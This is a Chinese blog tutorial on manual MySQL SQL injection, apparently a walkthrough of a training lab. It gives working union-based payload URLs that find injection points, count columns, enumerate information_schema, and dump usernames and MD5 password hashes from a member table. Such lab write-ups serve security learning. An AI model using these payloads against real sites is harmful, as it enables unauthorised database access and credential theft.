MySQL手工注入

已于 2022-03-16 18:52:21 修改
阅读量3.4k 收藏 10
点赞数 1
文章标签: mysql 数据库 web安全
于 2022-03-16 18:47:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao_he0123/article/details/123531746
版权

MySQL手工注入基本知识

前言

此次文章建立在MySQL数据库的基础上

一、SQL注入的原理

可控变量带入数据库查询,变量未存在过滤或者过滤不完整

二,如何判断是否有注入点

and 1=1页面正常
and 1=2页面错误则表明有注入点
同时也可以对参数随意赋值判断如果随意赋值后界面发生变化则代表有注入点
在这里插入图片描述
在这里插入图片描述

三、步骤

1.MySQL信息收集

(1)操作系统

@@verison_comile_os

(2)数据库名

database()

(3)数据库用户

user()

(4)数据库版本

version()

(5)网络路径等

2.数据注入

同数据库的基础下

低版本通过暴力查询或者结合读取查询
高版本通过对名为information_schema的数据库名的有据查询

高版本MySQL中都会有一个名为information_schema的数据库存储记录了所有数据库名,表名,列名
具体步骤通过下列实例表面

四,案例演示

1.判断是否有注入点

http://124.70.64.48:49303/new_list.php?id=1 and 1=1
页面无误
http://124.70.64.48:49303/new_list.php?id=1 and 1=2
页面出现错误判断有错误点

2.确认字段数

通过‘order by’代码查询
http://124.70.64.48:49303/new_list.php?id=1 order by 1
http://124.70.64.48:49303/new_list.php?id=1 order by 2
http://124.70.64.48:49303/new_list.php?id=1 order by 3
http://124.70.64.48:49303/new_list.php?id=1 order by 4
http://124.70.64.48:49303/new_list.php?id=1 order by 5
到order by 5的时候页面出现错误所以有4个字段

3.判断回显点

sql注入回显点是指sql查询结果显示在页面上位置有回显点的sql注入叫做回显点注入,比如一篇文章的标题、作者、时间、内容等等,这些都可能成为回显点。

我们要使用union select语句,联合查询,通过页面回显找到回显点,再利用其获取我们需要查询的数据。

前置知识:
select 语句用于从表中选取数据。
union 操作符用于合并两个或多个 SELECT 语句的结果集。

UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名

意思就是 联合查询前后的两个表,第一个表的字段数与第二个表的字段数必须相等,否则就会报错

http://124.70.64.48:49303/new_list.php?id=1 union select 1,2,3,4

之前查询到有4个字段数所以联合查询时第二个表的字段数也要为4
在这里插入图片描述

如果第二个字段数与第一个不同就会错误

http://124.70.64.48:49303/new_list.php?id=1 union select 1
在这里插入图片描述

这里用到对回显数的查询方式如下(在id=1加上‘-’让其显示报错)

http://124.70.64.48:49303/new_list.php?id=-1 union select 1,2,3,4

在这里插入图片描述
这里就可以得到回显点时2和3的位置

4.查询相关内容

记录所有表名信息的表

information_schema.tables

记录所有列名信息的表

information_schema.column

表名

table_name

列名

column_name

数据库名

table_schema

1查询库名

http://124.70.64.48:49303/new_list.php?id=-1union select1,database(),database(),4
在这里插入图片描述

库名叫‘mozhe_Discuz_StormGroup’

2.查询版本号

http://124.70.64.48:49303/new_list.php?id=-1 union select1,version(),version(),4

在这里插入图片描述
版本号在5.0以上是高版本

3.查询数据库表名

http://124.70.64.48:49303/new_list.php?id=-1 union%20select1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

这里不能from tables因为我们要查询的时在information_schema库下的table库中的表名
在这里插入图片描述

4.查询列名信息

http://124.70.64.48:49303/new_list.php?id=-1 union select
1,group_concat(column_name),3,4 from information_schema.columns where
table_schema=‘mozhe_Discuz_StormGroup’

在这里插入图片描述

5.查询具体数据

http://124.70.64.48:49303/new_list.php?id=-1 union select
1,name,password,4 from StormGroup_member

在这里插入图片描述
进而就得到了name和pass(MD5加密)
这里得到的并使想要的答案就需要对其他的信息获取

http://http://124.70.64.48:49303//new_list.php?id=-1 union select
1,concat(name,’-’,password,’-’,status),3,4 from StormGroup_member
limit 0,1

在这里插入图片描述

http://http://124.70.64.48:49303//new_list.php?id=-1 union select
1,concat(name,’-’,password,’-’,status),3,4 from StormGroup_member
limit 1,1

在这里插入图片描述

just a leaf
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL手工注入入门
L_KevinK的博客
08-01 308
MySQL手工注入入门————简单实例(1)测试注入点是否可用(2)猜表字段数(3)使用联合查询,爆出显示位(4)查询数据库信息(5)查询相关数据表(6)查询、猜解表中字段(6)查询字段内容 (1)测试注入点是否可用 常用方法: (1)链接后加单引号看页面是否报错 (2)链接后分别加 and 1=1 与 and 1=2 看返回页面是否有差异 实例测试: 1)链接后加 ’ 返回页面错误 ...
MySQL手工注入(内含实验)
weixin_57959384的博客
03-12 4014
网站的账号和密码在哪里? 数据库里。 数据库中储存着数据表,字段,数据,内容。结构化查询语句(SQL) 什么是SQL注入? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 实验: 墨者学院,注册,登录。 找到靶场 (实验名称:MySQL手工注入漏洞测试(MySQL数据库)) 一、判断注
Mysql 手工注入
weixin_45625450的博客
09-14 778
p=1&id=4’ and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=‘表名’ #x%’ and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9,…
注入mysql数据库手工注入
2301_79194110的博客
09-15 289
MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似Access的方法进行查询猜解。首先,利用order by获得当前表的字段数,再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时,由于不知道数据库中的表名与字段名,因此只能像Access一样直接用常见表名和字段名进行猜测判断。MySQL 5版本由于information_schema库的存在,注入攻击相对来说方便了许多。
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 795
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2134
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
小白学习篇:MYSQL手工注入之多种类多姿势剖析(上)
weixin_64683116的博客
05-21 412
sql手工注入
SQL 手工注入
热门推荐
枫梓林のBlog
04-25 1万+
SQL 手工注入 文章目录SQL 手工注入0x01 SQL注入概述0x02 SQL 注入原理1.基本概述2.单引号的作用3.SQL 注入流程4.SQL 注入的基本分类3.常见注入方式分类0x03 部署 sqli-labs 学习环境1.sqli-labs 简介2.部署sqli-labs 实验环境2.1 搭建LAMP 环境2.2 检查安装的状态和启动服务2.3 配置 mysq 数据库 root 用户密码2.4 安装 sqli-labs 教学环境2.5 创建快照0x04 安装 hackbar 插件0x05 SQL
Mysql手工注入
09-16
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
PHP+MySQL 手工注入语句大全 推荐
10-29
我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。
MySql手工注入.doc#资源达人分享计划#
08-12
MySQL手工注入是网络安全领域中的一个重要话题,特别是在Web应用程序的安全防护中。MySQL数据库由于其广泛使用,成为了黑客攻击的目标。在本教程中,我们将探讨如何利用MySQL手工注入漏洞来获取敏感信息。 首先,...
sql server 2008 mysql 手工注入
03-25
总的来说,SQL Server 2008和MySQL手工注入问题可以通过编程最佳实践、使用预处理语句、限制用户权限以及保持系统更新来有效预防。了解这些概念并能实际应用,对于任何IT专业人士,尤其是负责数据库管理和安全的...
Mysql手工注入教程,保姆级教学过程
weixin_43167326的博客
01-30 3655
1.老方法:and 1=1 正常 and 1=2 页面错误 就可能存在注入点 2.判断字段 order by 1....n不显示那么它的前一个就是它的字段数量id=-1 union select 1,2,3,4... 3.信息收集:version()版本,database()数据库名字,user()数据用户,@@version_compile_os操作系统 4.在MySQL5.0以上版本中,mysql存在一个自带数据库名为information_shcema,它是一个存储记录所有数据库名,表名,列名的
手工注入
LYSM
05-08 2167
** 判断是否存在注入 ** 1 1' and 1=1;# 如果返回结果相同则可能存在注入,再次比较—— 1' and 1=1;# 1' and 1=2;# 结果不同,则基本可以确定存在注入。 猜测表中的列数 1' order by 1;# 1' order by 2;# 1' order by 3;# ... ... 直到报错为止,order by 后的值就是列数。 拼接语句 union ...
mysql手工注入教程_易懂的SQL手工注入教程【个人笔记精华整理】
weixin_34410564的博客
01-21 422
SQL注入教程说明·本教程旨在带领理解SQL注入基本原理与实现方式,以及常见的注入操作。·学习SQL注入之前需要先学习基本的SQL语句,http基本的get与post请求,url编码。·本教程从笔记中整理修饰,可能连贯性不强,不够系统,但都是重要且需要理解的点。·建议基于Sqlilab边学习边实践SQL手工注入入门教程mysql基本hack函数:midSELECTMID(ColumnName,...
sql手工注入实战
mulincong的博客
05-30 2248
sql手工注入封神台靶场
sql mysql 手注_简单sql注入(手注)
weixin_42579969的博客
02-22 597
一、Sql简单手注的一般思路:1、 先看是不是注入点(字符型、整型)2、 判断字段数3、 判断是否可以用union联合查询(是否有显示位)4、 获取所有数据库名5、 获取数据库中表名6、 获取表中的字段名7、 获取字段中的信息数据1、 先看是不是注入点*加单引号 (‘)如果报错则可能存在输入?2-1页面变化(数值型)*数字型:and 1=1正常;and 1=2报错or 2>1 正常;or 1...
我们的成长之路——MySQL数据库基本手工注入总结
weixin_63265626的博客
07-08 401
② 有些时候莫名其妙的就出错的时候(比如有数字显示位,而用替换函数(比如version())去替换时却返回空白页或报错),爆不出来的时候,可以尝试通过hex()或convert()等函数来解决可能的编码问题,比如hex(version())、unhex(hex(version()))、convert(version() using latin1)等等。如果你还不放心那就这样/*!④ and 1=2 union select 1,2,group_concat(列名1,0x3a,列名2),4 from 表名。
几种手工注入的原理
qq_43609884的博客
06-13 768
sql手工注入
PHP手工注入实战:揭示数据库秘密
"这篇文档详细介绍了如何进行PHP手工注入攻击,通过实例展示了SQL注入的过程,以及如何获取数据库的相关信息。" 在PHP编程中,SQL注入是一种常见的安全漏洞,攻击者可以利用这种漏洞来操纵数据库查询,获取敏感信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值